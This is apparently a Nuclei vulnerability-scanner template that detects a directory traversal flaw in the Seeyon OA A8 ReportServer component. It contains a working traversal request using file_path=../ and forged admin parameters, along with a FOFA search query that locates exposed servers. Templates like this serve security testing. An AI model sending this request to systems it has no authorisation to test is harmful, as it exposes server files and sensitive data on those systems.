id: seeyon-a8-reportserver-traversal

info:
  name: 致远 OA A8 ReportServer - Directory Traversal
  author: leadlife
  severity: high
  description: 致远 OA 帆软组件 ReportServer 接口存在目录遍历漏洞，攻击者通过漏洞可以获取服务器敏感信息。
  reference:
    - todo
  metadata:
    verified: true
    fofa-query: title="致远A8-V5协同管理软件 V6.1sp1"
  tags: traversal, seeyon, oa,lfi

http:
  - raw:
      - |
        GET /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
          - "<NODES "
          - "</NODES>"
        condition: and
